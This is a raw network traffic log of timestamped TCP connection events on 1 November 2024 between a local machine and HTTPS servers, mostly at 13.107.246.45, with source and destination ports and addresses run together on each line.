                                                                                        Nov 1, 2024 13:46:47.845710039 CET4434981413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.846147060 CET49814443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.846147060 CET49814443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.846173048 CET4434981413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.857311964 CET4434981013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.857594967 CET4434981013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.860490084 CET49810443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.860490084 CET49810443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.860515118 CET49810443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.860524893 CET4434981013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.872415066 CET49815443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.872483015 CET4434981513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.872639894 CET49815443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.873008013 CET4434981113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.873039007 CET49815443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.873061895 CET4434981513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.873110056 CET4434981113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.873290062 CET49811443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.873290062 CET49811443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.873341084 CET49811443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.873358011 CET4434981113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.875682116 CET49816443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.875725985 CET4434981613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.875967979 CET49816443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.875967979 CET49816443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.875993013 CET4434981613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.881161928 CET4434981213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.881325960 CET4434981213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.886571884 CET49812443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.886998892 CET49812443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.887020111 CET4434981213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.887053967 CET49812443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.887059927 CET4434981213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.889786959 CET49817443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.889837027 CET4434981713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:47.890116930 CET49817443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.892410040 CET49817443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:47.892426968 CET4434981713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.550508022 CET4434981313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.560199976 CET49813443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.560244083 CET4434981313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.560714960 CET49813443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.560724020 CET4434981313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.590800047 CET4434981413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.591336966 CET49814443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.591358900 CET4434981413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.591774940 CET49814443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.591780901 CET4434981413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.615005016 CET4434981613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.615433931 CET49816443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.615457058 CET4434981613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.615845919 CET49816443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.615849972 CET4434981613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.636190891 CET4434981713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.636693001 CET49817443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.636729002 CET4434981713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.637093067 CET49817443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.637098074 CET4434981713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.639583111 CET4434981513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.639906883 CET49815443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.639962912 CET4434981513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.640379906 CET49815443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.640407085 CET4434981513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.687056065 CET4434981313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.687129974 CET4434981313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.687196016 CET49813443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.687342882 CET49813443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.687396049 CET4434981313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.687428951 CET49813443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.687444925 CET4434981313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.690077066 CET49818443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.690114975 CET4434981813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.690171957 CET49818443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.690371037 CET49818443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.690392971 CET4434981813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.721715927 CET4434981413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.721777916 CET4434981413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.721833944 CET49814443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.721987963 CET49814443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.722002983 CET4434981413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.722012997 CET49814443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.722018957 CET4434981413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.724221945 CET49819443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.724292994 CET4434981913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.724443913 CET49819443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.724555016 CET49819443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.724569082 CET4434981913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.746787071 CET4434981613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.746851921 CET4434981613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.746967077 CET49816443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.746994972 CET49816443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.747010946 CET4434981613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.747020960 CET49816443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.747025967 CET4434981613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.749356985 CET49820443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.749409914 CET4434982013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.749602079 CET49820443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.749737978 CET49820443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.749748945 CET4434982013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.768099070 CET4434981713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.768170118 CET4434981713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.768239021 CET49817443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.768345118 CET49817443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.768364906 CET4434981713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.768378019 CET49817443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.768383980 CET4434981713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.770361900 CET49821443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.770407915 CET4434982113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.770560026 CET49821443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.770740032 CET49821443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.770750999 CET4434982113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.775980949 CET4434981513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.776073933 CET4434981513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.776164055 CET49815443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.776204109 CET49815443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.776205063 CET49815443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.776226044 CET4434981513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.776241064 CET4434981513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.778167963 CET49822443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.778266907 CET4434982213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:48.778338909 CET49822443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.778493881 CET49822443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:48.778525114 CET4434982213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.432640076 CET4434981813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.433300972 CET49818443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.433322906 CET4434981813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.433768034 CET49818443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.433773041 CET4434981813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.441078901 CET4434981913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.441828966 CET49819443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.441855907 CET4434981913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.441884995 CET49819443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.441890001 CET4434981913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.493417978 CET4434982013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.494199038 CET49820443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.494223118 CET4434982013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.494427919 CET49820443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.494432926 CET4434982013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.510273933 CET4434982213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.511121035 CET49822443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.511121035 CET49822443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.511127949 CET4434982213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.511146069 CET4434982213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.511924982 CET4434982113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.512423992 CET49821443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.512445927 CET4434982113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.512660027 CET49821443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.512667894 CET4434982113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.564491034 CET4434981813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.564786911 CET4434981813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.568698883 CET49818443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.568698883 CET49818443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.568698883 CET49818443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.568947077 CET4434981913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.569350004 CET4434981913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.569525003 CET49819443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.569963932 CET49819443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.569983959 CET4434981913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.570009947 CET49819443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.570017099 CET4434981913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.572319984 CET49823443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.572350025 CET4434982313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.572467089 CET49823443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.572916031 CET49823443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.572928905 CET4434982313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.572999954 CET49824443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.573034048 CET4434982413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.573168993 CET49824443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.573168993 CET49824443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.573195934 CET4434982413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.640727997 CET4434982213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.641333103 CET4434982213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.641477108 CET49822443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.641477108 CET49822443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.641642094 CET49822443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.641680002 CET4434982213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.643105984 CET4434982113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.643260956 CET4434982113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.643420935 CET49821443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.643462896 CET49821443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.643462896 CET49821443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.643481016 CET4434982113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.643491030 CET4434982113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.643935919 CET49825443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.643975019 CET4434982513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.644098043 CET49825443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.644243956 CET49825443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.644258976 CET4434982513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.645564079 CET49826443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.645598888 CET4434982613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.645761967 CET49826443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.645761967 CET49826443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.645791054 CET4434982613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.699356079 CET4434982013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.699512959 CET4434982013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.699644089 CET49820443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.699644089 CET49820443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.699708939 CET49820443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.699733973 CET4434982013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.702056885 CET49827443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.702089071 CET4434982713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.702274084 CET49827443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.702487946 CET49827443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.702501059 CET4434982713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:49.877353907 CET49818443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:49.877388000 CET4434981813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.302440882 CET4434982313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.302918911 CET49823443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.302942038 CET4434982313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.303414106 CET49823443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.303419113 CET4434982313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.311791897 CET4434982413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.312099934 CET49824443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.312112093 CET4434982413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.312489986 CET49824443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.312494993 CET4434982413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.382781029 CET4434982513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.383222103 CET49825443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.383253098 CET4434982513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.383621931 CET49825443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.383626938 CET4434982513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.398116112 CET4434982613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.398514986 CET49826443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.398525000 CET4434982613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.398909092 CET49826443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.398911953 CET4434982613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.433376074 CET4434982313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.433442116 CET4434982313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.433528900 CET49823443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.433677912 CET49823443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.433695078 CET4434982313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.433717012 CET49823443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.433722019 CET4434982313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.436408043 CET49828443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.436449051 CET4434982813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.436723948 CET49828443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.436886072 CET49828443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.436896086 CET4434982813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.442608118 CET4434982413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.442764997 CET4434982413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.442809105 CET49824443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.442857981 CET49824443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.442871094 CET4434982413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.442879915 CET49824443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.442883968 CET4434982413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.444968939 CET49829443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.445019007 CET4434982913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.445074081 CET49829443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.445185900 CET49829443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.445204973 CET4434982913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.474277020 CET4434982713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.474757910 CET49827443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.474791050 CET4434982713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.475168943 CET49827443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.475174904 CET4434982713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.522089005 CET4434982513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.522725105 CET4434982513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.522783041 CET49825443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.522830963 CET49825443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.522854090 CET4434982513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.522870064 CET49825443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.522876978 CET4434982513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.525850058 CET49830443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.525892973 CET4434983013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.525979996 CET49830443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.526129007 CET49830443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.526139975 CET4434983013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.529547930 CET4434982613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.529633045 CET4434982613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.529723883 CET49826443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.529771090 CET49826443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.529786110 CET4434982613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.529793978 CET49826443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.529799938 CET4434982613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.531763077 CET49831443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.531804085 CET4434983113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.531900883 CET49831443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.532077074 CET49831443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.532092094 CET4434983113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.565836906 CET49832443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:46:50.565877914 CET44349832142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.566040993 CET49832443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:46:50.566370964 CET49832443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:46:50.566385031 CET44349832142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.614084959 CET4434982713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.614157915 CET4434982713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.614411116 CET49827443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.614530087 CET49827443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.614558935 CET4434982713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.614573956 CET49827443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.614578962 CET4434982713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.626538038 CET49833443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.626585007 CET4434983313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:50.626673937 CET49833443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.626878977 CET49833443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:50.626890898 CET4434983313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.165334940 CET4434982813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.165882111 CET49828443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.165910006 CET4434982813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.166337013 CET49828443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.166342974 CET4434982813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.192615032 CET4434982913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.193125010 CET49829443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.193192959 CET4434982913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.193669081 CET49829443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.193684101 CET4434982913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.259532928 CET4434983013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.260030031 CET49830443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.260061979 CET4434983013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.260457039 CET49830443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.260462999 CET4434983013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.273641109 CET4434983113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.274094105 CET49831443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.274122000 CET4434983113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.274513006 CET49831443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.274518967 CET4434983113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.294720888 CET4434982813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.294805050 CET4434982813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.294852972 CET49828443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.294970989 CET49828443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.294987917 CET4434982813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.294996977 CET49828443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.295002937 CET4434982813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.297720909 CET49834443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.297768116 CET4434983413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.297856092 CET49834443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.298042059 CET49834443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.298058987 CET4434983413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.325997114 CET4434982913.107.246.45192.168.2.4
